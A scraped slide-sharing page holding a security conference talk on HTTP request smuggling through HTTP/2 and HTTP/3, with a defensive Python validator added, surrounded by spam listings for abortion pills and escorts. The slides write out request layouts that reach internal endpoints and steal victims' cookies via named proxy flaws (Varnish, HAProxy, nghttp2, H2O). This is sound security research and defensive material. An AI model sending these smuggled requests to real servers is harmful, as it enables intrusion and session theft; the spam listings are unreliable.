Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Steffen Staab
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providermohitmore19
 
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerHow To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerThousandEyes
 
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfonteinmasabamasaba
 
Sector 18, Noida Call girls :8448380779 Model Escorts | 100% verified
Sector 18, Noida Call girls :8448380779 Model Escorts | 100% verifiedSector 18, Noida Call girls :8448380779 Model Escorts | 100% verified
Sector 18, Noida Call girls :8448380779 Model Escorts | 100% verifiedDelhi Call girls
 
The Top App Development Trends Shaping the Industry in 2024-25 .pdf
The Top App Development Trends Shaping the Industry in 2024-25 .pdfThe Top App Development Trends Shaping the Industry in 2024-25 .pdf
The Top App Development Trends Shaping the Industry in 2024-25 .pdfayushiqss
 
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrainmasabamasaba
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...panagenda
 

Recently uploaded (20)

Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdf
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdfAzure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdf
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdf
 
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park %in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
 
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112  Starting From 5K to 15K High Profile Escorts ...Chinsurah Escorts ☎️8617697112  Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
 
8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students
 
Define the academic and professional writing..pdf
Define the academic and professional writing..pdfDefine the academic and professional writing..pdf
Define the academic and professional writing..pdf
 
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
 
Exploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdfExploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdf
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Models
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
 
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park %in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service provider
 
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerHow To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
 
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICECHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
 
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
 
Sector 18, Noida Call girls :8448380779 Model Escorts | 100% verified
Sector 18, Noida Call girls :8448380779 Model Escorts | 100% verifiedSector 18, Noida Call girls :8448380779 Model Escorts | 100% verified
Sector 18, Noida Call girls :8448380779 Model Escorts | 100% verified
 
The Top App Development Trends Shaping the Industry in 2024-25 .pdf
The Top App Development Trends Shaping the Industry in 2024-25 .pdfThe Top App Development Trends Shaping the Industry in 2024-25 .pdf
The Top App Development Trends Shaping the Industry in 2024-25 .pdf
 
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
 

HTTP Request Smuggling via higher HTTP versions

  • 1. Emil Lerner HTTP Request Smuggling via higher HTTP versions
  • 2. Emil Lerner independentsecurityresearcher CTO at WunderFund.io Bushwhackers CTF team @emil_lerner @neex
  • 4. Reverse proxy HTTP Response HTTP Request Client HTTP Response HTTP Request Frontend Server Backend Server
  • 5. HTTP keep-alive HTTP Response 1 HTTP Request 1 HTTP Response 2 HTTP Request 2 Client Server
  • 6. HTTP/1.1 body transfer Content-Length header Content-Length: 100 Here goes 100 bytes of the request body. Transfer-Encoding: chunked ff 10 0 Here goes 255-byte chunk Another chunk Chunked encoding
  • 7. HTTP keep-alive (to backend) HTTP Response 1 HTTP Request 1 HTTP Response 1 HTTP Request 1 HTTP Response 2 HTTP Request 2 HTTP Response 2 HTTP Request 2 Single backend connection Client2 connection Client1 connection Client1 Client2 Frontend Server Backend Server
  • 8. HTTP Request Smuggling Old & known attack Gained a lot of attention after James Kettle's talk on BH USA 2019 He discovered a lot of new techniques
  • 9. HTTP Request Smuggling An attacker sends a malicious request It is parsed as a single request by the frontend and is forwarded to the backend Backend parses it as two separate requests
  • 10. POST / HTTP/1.1 Content-Length: 100 0 Transfer-Encoding : chunked GET /internal HTTP/1.1 ... Frontend interprets this Backend interprets this Frontend thinks it's body Backend thinks it's another request HTTP Request Smuggling
  • 11. HTTP Request Smuggling It's all about Content-Length / Transfer-Encoding Transfer-Encoding has precedence We need to "smuggle" Transfer-Encoding to backend unprocessed by the frontend
  • 12. HTTP Request Smuggling POST / HTTP/1.1 Content-Length: 100 Transfer-Encoding: identity, 0 chunked GET /internal HTTP/1.1 ... Frontend interprets this Backend interprets this Frontend thinks it's body Backend thinks it's another request
  • 13. Exploitation Accessing internal endpoints Cache poisoning Stealing other users’ requests
  • 14. Exploitation: stealing requests Attacker→Frontend Victim→Frontend GET / HTTP/1.1 ... POST /save HTTP/1.1 Transfer-Encoding : chunked GET / HTTP/1.1 Cookie: secret GET / HTTP/1.1 Transfer-Encoding : chunked ... POST /save HTTP/1.1 data=GET / HTTP/1.1 Cookie: secret Frontend→Backend
  • 15. Exploitation: stealing requests The victim's request is appended to ours Most frameworks are OK with newlines in forms Victim's cookies are saved to our profile, PMs or other places where we can view them later
  • 16. HTTP/2 overview Widely adopted by now Binary protocol (no special chars) Almost always terminated at frontend
  • 17. HTTP/2 termination :status 200 PRI * HTTP/2.0 <binary> :method GET HTTP/1.1 200 OK GET / HTTP/1.1 Frontend Backend Client
  • 18. HTTP/2 body transfer Request body is transferred in binary frames Content-Length not required, but allowed Transfer-Encoding: chunked has no effect
  • 19. Potential bug #1: content-length conflicts with actual length
    Client→Frontend:
      :method POST
      :authority host.com
      content-length: 1
      body: XGET /internal HTTP/1.1 ...
    Frontend→Backend:
      POST / HTTP/1.1
      Host: host.com
      Content-Length: 1

      XGET /internal HTTP/1.1     ← backend reads "X" as the 1-byte body, the rest as a new request
      ...
  • 20. Potential bug #2: no content-length forwarding
    Client→Frontend:
      :method GET
      :authority host.com
      body: GET /internal HTTP/1.1
    Frontend→Backend:
      GET / HTTP/1.1
      Host: host.com

      GET /internal HTTP/1.1      ← no Content-Length was sent, so the body is parsed as a new request
  • 21. Potential bug #3: content-length conflicting with transfer-encoding
    Client→Frontend:
      :method POST
      :authority host.com
      content-length: 100
      transfer-encoding: chunked
      body: 0 ⏎⏎ GET /internal HTTP/1.1 ...
    Frontend→Backend:
      POST / HTTP/1.1
      Host: host.com
      Content-Length: 100
      Transfer-Encoding: chunked

      0

      GET /internal HTTP/1.1
      ...
  • 22. HTTP/2 header validation
    Header names and values are binary strings
    Names and values can contain newlines
    Names can contain colons
  • 23. Potential bug #4: newlines in headers
    Client→Frontend:
      :method GET
      :authority host.com
      x: ...⏎⏎GET /internal HTTP/1.1
    Frontend→Backend:
      GET / HTTP/1.1
      Host: host.com
      X: ...

      GET /internal HTTP/1.1
  • 24. Potential bug(s) #5: less strict validation
    Client→Frontend:
      :method POST
      :authority host.com
      content-length: 100
      transfer-encoding : chunked    (space before the colon)
      body: 0 ⏎⏎ GET /internal HTTP/1.1 ...
    Frontend→Backend:
      POST / HTTP/1.1
      Host: host.com
      Content-Length: 100
      transfer-encoding : chunked

      0

      GET /internal HTTP/1.1
      ...
  • 25. Potential bug(s) #5: less strict validation
    Client→Frontend:
      :method POST
      :authority host.com
      content-length: 100
      transfer_encoding: chunked     (underscore instead of hyphen)
      body: 0 ⏎⏎ GET /internal HTTP/1.1 ...
    Frontend→Backend:
      POST / HTTP/1.1
      Host: host.com
      Content-Length: 100
      Transfer_Encoding: chunked

      0

      GET /internal HTTP/1.1
      ...
  • 26. Potential bug(s) #5: less strict validation
    Client→Frontend:
      :method POST
      :authority host.com
      content-length: 100
      transfer-encoding: chunKed     (mixed-case value)
      body: 0 ⏎⏎ GET /internal HTTP/1.1 ...
    Frontend→Backend:
      POST / HTTP/1.1
      Host: host.com
      Content-Length: 100
      Transfer-Encoding: chunKed

      0

      GET /internal HTTP/1.1
      ...
  • 27. What does the RFC say?
    RFC 7540 mentions Intermediary Encapsulation Attacks in section 10.3
    Basically says "an implementation must reject things it can't handle" :)
    Explicitly mentions newlines and the NUL byte (0x00)
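    What the "reject what you can't handle" rule looks like in practice for a frontend that translates HTTP/2 to HTTP/1.1, covering bugs #1 to #5 above as well as the RFC 8441 :protocol case and the space-in-:method case mentioned later in the deck. This is an added example written for this page; it is not code from http2smugl, nghttp2, HAProxy, Varnish or any other real proxy. The shape of the input (a list of (name, value) byte-string pairs as decoded from HPACK, plus the concatenated DATA payload), the names translate_h2_to_h1, is_rejected and SmugglingRisk, and the choice to treat "transfer_encoding" as an alias of "transfer-encoding" are assumptions of this example, not behaviour described by the slides.

```python
"""HTTP/2 -> HTTP/1.1 request translation with strict validation.

Added example for this deck, not the code of http2smugl or of any real proxy.
Input is modelled as the decoded HPACK header list, a list of (name, value)
byte-string pairs, plus the concatenated DATA payload.  Anything the HTTP/1.1
side could frame differently from us is refused (RFC 7540 section 10.3)."""
import re

# RFC 9110 "token": what an HTTP/1.1 parser accepts as a method or header name.
TOKEN_RE = re.compile(rb"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")
# Bytes that would break a serialised header line: CR, LF, NUL and the other
# control bytes (HTAB is the one control byte allowed in a field value).
CTL_RE = re.compile(rb"[\x00-\x08\x0a-\x1f\x7f]")
ALLOWED_PSEUDO = {b":method", b":scheme", b":authority", b":path", b":protocol"}
# Framing / hop-by-hop headers.  How the backend connection frames the body is
# our decision, so a client-supplied copy of any of these fails the request.
FORBIDDEN = {b"transfer-encoding", b"connection", b"upgrade", b"keep-alive",
             b"proxy-connection", b"te", b"http2-settings"}


class SmugglingRisk(ValueError):
    """The request cannot be forwarded without a framing ambiguity."""


def translate_h2_to_h1(headers, body):
    """Return the HTTP/1.1 request bytes to send upstream, or raise SmugglingRisk."""
    pseudo, regular, seen_regular, declared_len = {}, [], False, None
    for name, value in headers:
        if name.startswith(b":"):
            # Known pseudo-headers only, no duplicates, all before regular headers.
            if name not in ALLOWED_PSEUDO or name in pseudo or seen_regular:
                raise SmugglingRisk(f"bad pseudo-header {name!r}")
            pseudo[name] = value
            continue
        seen_regular = True
        # Names must be lowercase tokens: "transfer-encoding " (trailing space)
        # or "Transfer-Encoding" is malformed in HTTP/2 and must not reach HTTP/1.1.
        if not TOKEN_RE.match(name) or name != name.lower():
            raise SmugglingRisk(f"malformed header name {name!r}")
        if CTL_RE.search(value):
            raise SmugglingRisk(f"control byte in value of {name!r}")
        # Compare a normalised name so "transfer_encoding" is caught too (bug #5):
        # some HTTP/1.1 servers treat '_' and '-' alike when they look headers up.
        if name.replace(b"_", b"-") in FORBIDDEN:
            raise SmugglingRisk(f"framing header {name!r} supplied by client")
        if name == b"host":
            if value != pseudo.get(b":authority"):
                raise SmugglingRisk("host header disagrees with :authority")
            continue  # Host is emitted once, from :authority
        if name == b"content-length":
            if not re.fullmatch(rb"[0-9]+", value) or (
                    declared_len is not None and declared_len != int(value)):
                raise SmugglingRisk("invalid or conflicting content-length")
            declared_len = int(value)
            continue  # re-emitted below from the real body length
        regular.append((name, value))
    # A declared length disagreeing with the DATA actually received is the bug #1
    # pattern: the backend would parse the remainder as a second request.
    if declared_len is not None and declared_len != len(body):
        raise SmugglingRisk(f"content-length {declared_len} != body {len(body)}")
    method = pseudo.get(b":method", b"")
    path, authority = pseudo.get(b":path", b""), pseudo.get(b":authority", b"")
    # The method must be a token: ":method GET /internal" would rewrite the
    # request line, and with it the path the backend sees.
    if not TOKEN_RE.match(method) or not path or not authority:
        raise SmugglingRisk("missing or malformed :method/:path/:authority")
    if any(re.search(rb"[\x00-\x20\x7f]", p) for p in (path, authority)):
        raise SmugglingRisk("whitespace or control byte in :path/:authority")
    extra = []
    if b":protocol" in pseudo:
        # RFC 8441 extended CONNECT becomes an Upgrade request on HTTP/1.1, where
        # DATA sent before the 101 has no framing at all, so it is not forwarded.
        proto = pseudo[b":protocol"]
        if method != b"CONNECT" or not TOKEN_RE.match(proto) or body:
            raise SmugglingRisk("malformed extended CONNECT or DATA before upgrade")
        method, extra = b"GET", [(b"Connection", b"Upgrade"), (b"Upgrade", proto)]
    elif method == b"CONNECT":
        raise SmugglingRisk("plain CONNECT tunnelling is out of scope here")
    lines = [method + b" " + path + b" HTTP/1.1", b"Host: " + authority]
    lines += [n + b": " + v for n, v in regular + extra]
    # Always state the framing ourselves, even if the client omitted it (bug #2).
    lines.append(b"Content-Length: %d" % len(body))
    return b"\r\n".join(lines) + b"\r\n\r\n" + body


def is_rejected(headers, body):
    """True if the translator refuses the request; handy for the checks below."""
    try:
        translate_h2_to_h1(headers, body)
    except SmugglingRisk:
        return True
    return False


if __name__ == "__main__":
    base = [(b":method", b"POST"), (b":scheme", b"https"),
            (b":authority", b"host.com"), (b":path", b"/")]
    print(translate_h2_to_h1(base + [(b"content-length", b"5")], b"hello"))
    # Constructed inputs mirroring bugs #1, #3, #4 and #5 from the slides.
    for hdr, body in [((b"content-length", b"1"), b"XGET /internal HTTP/1.1\r\n\r\n"),
                      ((b"transfer-encoding", b"chunked"), b"0\r\n\r\n"),
                      ((b"x", b"...\r\n\r\nGET /internal HTTP/1.1"), b""),
                      ((b"transfer_encoding", b"chunked"), b"")]:
        print(hdr, "rejected:", is_rejected(base + [hdr], body))
```

    The design point is that the translator never lets the client decide the HTTP/1.1 framing: Content-Length is always recomputed from the bytes actually received, every framing or hop-by-hop header from the client is a hard error rather than something to strip, and any name, value or pseudo-header that an HTTP/1.1 parser might read differently from the HTTP/2 layer fails the request outright instead of being forwarded "as is". Header values are checked only for control bytes, because the slides show the HTTP/1.1 side tolerating case differences such as "chunKed"; rejecting the header name, whatever its value, closes that whole family.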
  • 28. Detection idea #1: make backend expect more data
    Craft a request such that
      the backend expects more data
      the frontend thinks it sent the whole request
    The request will hang
    Implemented in James Kettle's Burp plugin (for HTTP/1.1)
  • 29. Detection idea #1: make backend expect more data
    :method POST
    content-length: 5                ← frontend interprets this
    h:⏎transfer-encoding:chunked     ← backend interprets this
    body: fff                        ← frontend thinks the body is finished; backend expects more data and hangs
  • 30. Detection idea #2: chunked body parsing
    Chunked encoding should never be parsed in HTTP/2
    If the response depends on the validity of the chunked encoding, it is a possible vulnerability
    There are some false positives
  • 31. Detection idea #2: chunked body parsing
    Client → Frontend:
      :method POST
      transfer-encoding : chunked
      body: invalid chunked body
    Frontend → Backend:
      POST / HTTP/1.1
      transfer-encoding : chunked

      invalid chunked body
    Backend → Frontend: HTTP/1.1 400
    Frontend → Client:  :status 400
  • 32. Detection idea #3: content-length parsing
    Send something like x:x⏎content-length:1000
    If the response depends on the value, it's a possible vulnerability
    Even more false positives :(
  • 33. False positive scenario
    Client → Frontend: HTTP/2
    Frontend: HTTP/2 termination → HTTP/1 processing
    Frontend → Backend: HTTP/1.1
  • 34. Varnish flaw
    Client→Varnish:
      :method GET
      :authority host.com
      content-length: 0
      body: GET /internal HTTP/1.1 ...
    Varnish→Backend:
      GET / HTTP/1.1
      Host: host.com
      content-length: 0

      GET /internal HTTP/1.1
      ...
  • 35. Potential bug #6: RFC 8441
    Designed for WebSockets over HTTP/2
    A client sends a CONNECT request and sets the :protocol pseudo-header
    The intermediary translates it to Upgrade
  • 36. Haproxy & nghttp2 flaws
    Client→Frontend:
      :method CONNECT
      :authority host.com
      :protocol websocket
      body: GET /internal HTTP/1.1 ...
    Frontend→Backend:
      GET / HTTP/1.1
      Host: host.com
      Connection: upgrade
      Upgrade: websocket

      GET /internal HTTP/1.1
      ...
  • 37. Open problem: one-way size discrepancy
    Attacks work if the backend reads less data than the frontend
    Detection methods work if the backend expects more data
    What if the first is achievable, but the second is not possible?
  • 38. H2O http3 (QUIC) flaw
    Client→Frontend:
      :method POST
      content-length: 100
      x:x⏎transfer-encoding:chunked
      body: 0 ⏎⏎ GET /internal HTTP/1.1 ...
    Frontend→Backend:
      POST / HTTP/1.1
      Content-length: 100
      X: x
      Transfer-Encoding: chunked

      0

      GET /internal HTTP/1.1
      ...
  • 39. Automation
    I've implemented the http2smugl tool
    It performs automatic vulnerability detection using the discussed methods
    It also supports sending "invalid" queries via a custom HTTP/2 implementation
  • 40. Further research needed
    HTTP/1 special headers, writing to closed streams, HPACK and >40 implementations not researched
    Stable detection methods wanted
    Putting space + path into :method can lead to hitting internal endpoints and Host override